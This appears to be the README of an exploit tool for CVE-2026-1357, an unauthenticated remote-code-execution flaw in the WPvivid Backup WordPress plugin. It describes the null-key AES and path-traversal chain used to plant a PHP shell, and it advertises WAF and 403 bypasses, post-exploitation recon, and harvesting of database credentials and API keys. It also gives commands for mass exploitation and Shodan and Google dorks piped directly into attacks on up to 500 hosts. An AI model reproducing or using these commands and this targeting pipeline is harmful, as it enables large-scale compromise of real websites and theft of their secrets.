Share
## https://sploitus.com/exploit?id=7267CD9E-8C27-5705-8A2C-2FCAEC7DE81F
# CVE-2026-1357 โ WPvivid Backup & Migration RCE
> **CVE Credit:** Lucas Montes (NiRoX)
> **Tool By:** CyberTechAjju
> **CVSS:** 9.8 (Critical) | **Affected:** โค 0.9.123 | **Patched:** 0.9.124
---
## โ ๏ธ Disclaimer
For **authorized security testing only**. Unauthorized access to systems is illegal.
---
## Overview
Unauthenticated RCE in WPvivid Backup & Migration via two chained bugs:
1. **Crypto Fail-Open** โ `openssl_private_decrypt()` returns `false` on bad key โ `phpseclib` v1 treats it as null-byte AES key โ attacker encrypts with 16 null bytes
2. **Path Traversal** โ unsanitized `name` field โ `../uploads/shell.php` escapes backup dir
**Constraint:** Exploitable only when `wpvivid_api_token` is generated and not expired.
---
## Features
| Feature | Description |
|---------|-------------|
| ๐ **Auto-Detection** | WordPress + WPvivid plugin + version fingerprinting |
| ๐ก๏ธ **WAF Bypass** | User-Agent rotation, header spoofing, encoding tricks |
| ๐ **403 Bypass** | X-Forwarded-For, X-Original-URL, path normalization, double encoding |
| ๐ **Auto-Exploit** | Null-key AES payload + path traversal upload |
| ๐ **Post-Exploit** | Auto-runs 20+ recon commands (id, whoami, passwd, wp-config, SUID, etc.) |
| ๐ **Data Extractor** | Greps DB creds, API keys, passwords, AWS keys from output |
| ๐ **Report Gen** | Markdown PoC report with full exploitation evidence |
| โก **Mass Scan** | Multi-threaded with proxy/Burp support |
---
## Install
```bash
git clone https://github.com/YOUR_USER/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt
```
---
## Usage
```bash
# Scan only (detect WordPress + WPvivid + version)
python3 cve_2026_1357.py -u http://target.com
# Scan + Exploit + Auto Post-Exploitation
python3 cve_2026_1357.py -u http://target.com --exploit
# Exploit without post-exploitation recon
python3 cve_2026_1357.py -u http://target.com --exploit --no-post
# Mass scan with report
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
# Through Burp proxy
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080
# Payload-only mode
python3 cve_2026_1357.py -u http://x --payload-only
```
### All Options
```
-u, --url Single target URL
-l, --list File with URLs (one per line)
--exploit Enable exploitation mode
--shell NAME Shell filename (default: pwn_remote.php)
--no-post Skip post-exploitation recon
--report Generate markdown PoC report
--report-dir DIR Report output directory
-t, --threads N Concurrent threads (default: 5)
--timeout SECS Request timeout (default: 10)
--proxy URL HTTP proxy for Burp
--payload-only Print base64 payload & exit
```
---
## Target Discovery (Dorks)
See **[dorks.md](dorks.md)** for full list. Quick ones:
```
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"
# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"
# Pipeline
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
| awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report
```
---
## Files
```
CVE-2026-1357-poc/
โโโ cve_2026_1357.py โ Main tool (scanner + exploiter + post-exploit)
โโโ dorks.md โ Shodan/Google/Censys/FOFA/ZoomEye dorks
โโโ requirements.txt โ Python dependencies
โโโ .gitignore
โโโ README.md โ This file
```
---
## Credits
**Lucas Montes (NiRoX)** โ CVE Discovery
**CyberTechAjju** โ Exploit Tooling